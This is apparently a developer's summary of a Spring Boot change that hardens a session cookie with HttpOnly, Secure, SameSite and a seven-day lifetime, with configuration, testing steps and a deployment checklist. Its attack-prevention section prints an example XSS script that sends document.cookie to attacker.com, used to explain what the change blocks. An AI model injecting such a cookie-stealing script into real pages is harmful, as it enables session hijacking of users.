✅ SECURE COOKIE IMPLEMENTATION - WHAT CHANGED

===========================================
1. IMPORTS UPDATED
===========================================
OLD: import jakarta.servlet.http.Cookie;
NEW: import org.springframework.http.ResponseCookie;
     import org.springframework.beans.factory.annotation.Value;

===========================================
2. CONFIGURATION ADDED (Class Fields)
===========================================
@Value("${cookie.secure:true}")
private boolean cookieSecure;

@Value("${cookie.same-site:Strict}")
private String cookieSameSite;

private static final int SESSION_TTL_DAYS = 7;
private static final int SESSION_TTL_SECONDS = 604800; // 7 days

===========================================
3. COOKIE CREATION - OLD vs NEW
===========================================

OLD CODE (INSECURE):
-------------------
Cookie cookie = new Cookie(config.getSessionIdName(), sessionId);
cookie.setHttpOnly(true);
cookie.setPath("/");
cookie.setMaxAge(70000);  // Wrong: 19 hours
response.addCookie(cookie);

NEW CODE (SECURE):
------------------
ResponseCookie cookie = ResponseCookie
    .from(config.getSessionIdName(), sessionId)
    .httpOnly(true)                 // ✅ Prevents JavaScript access
    .secure(cookieSecure)           // ✅ HTTPS only
    .path("/")                      // ✅ Available everywhere
    .maxAge(SESSION_TTL_SECONDS)    // ✅ 7 days = Redis TTL
    .sameSite(cookieSameSite)       // ✅ CSRF protection
    .build();

response.addHeader("Set-Cookie", cookie.toString());

===========================================
4. SECURITY IMPROVEMENTS
===========================================

✅ httpOnly(true)
   - Prevents XSS attacks
   - JavaScript cannot read cookie
   - document.cookie will NOT show this

✅ secure(cookieSecure)
   - Cookie only sent over HTTPS
   - Prevents Man-in-the-Middle attacks
   - Set false for localhost development

✅ sameSite(Strict/Lax/None)
   - Strict: Cookie NEVER sent on cross-site requests (most secure)
   - Lax: Cookie sent on top-level navigation (links, redirects)
   - None: Cookie sent everywhere (requires Secure=true)

✅ maxAge(604800)
   - Fixed: Now 7 days (matches Redis TTL)
   - Old was 19 hours (mismatched)

===========================================
5. CONFIGURATION (application.properties)
===========================================

# For localhost development (HTTP)
cookie.secure=false
cookie.same-site=Strict

# For production (HTTPS)
cookie.secure=true
cookie.same-site=Strict

===========================================
6. HOW IT WORKS
===========================================

DEVELOPMENT (localhost:7000):
- cookie.secure=false → Works on HTTP
- Cookie created and sent normally
- Browser accepts over HTTP

PRODUCTION (https://yourdomain.com):
- cookie.secure=true → Works only on HTTPS
- Cookie NEVER sent over HTTP
- Browser enforces HTTPS requirement

===========================================
7. TESTING
===========================================

1. Start server: mvn spring-boot:run

2. Login via: http://localhost:7000/api/v1/auth/start/vendor

3. Check browser DevTools → Application → Cookies:
   - Name: (from config)
   - HttpOnly: ✓
   - Secure: ✗ (localhost) or ✓ (production)
   - SameSite: Strict
   - Max-Age: 604800

4. Try to access in browser console:
   document.cookie  // Should NOT show the session cookie

===========================================
8. ATTACK PREVENTION
===========================================

❌ XSS Attack:
<script>
  fetch('https://attacker.com?cookie=' + document.cookie)
</script>
→ BLOCKED: httpOnly=true prevents JavaScript access

❌ MitM Attack:
Attacker intercepts HTTP traffic
→ BLOCKED: secure=true prevents cookie on HTTP

❌ CSRF Attack:
Attacker creates fake form on evil.com
→ BLOCKED: sameSite=Strict prevents cross-site requests

===========================================
9. PRODUCTION CHECKLIST
===========================================

Before deploying:
[ ] Set cookie.secure=true in production config
[ ] Ensure HTTPS is enabled on server
[ ] Test login flow on production domain
[ ] Verify cookie in browser DevTools
[ ] Test cross-origin requests blocked
[ ] Check maxAge matches Redis TTL

===========================================
END OF SECURITY UPDATE
===========================================

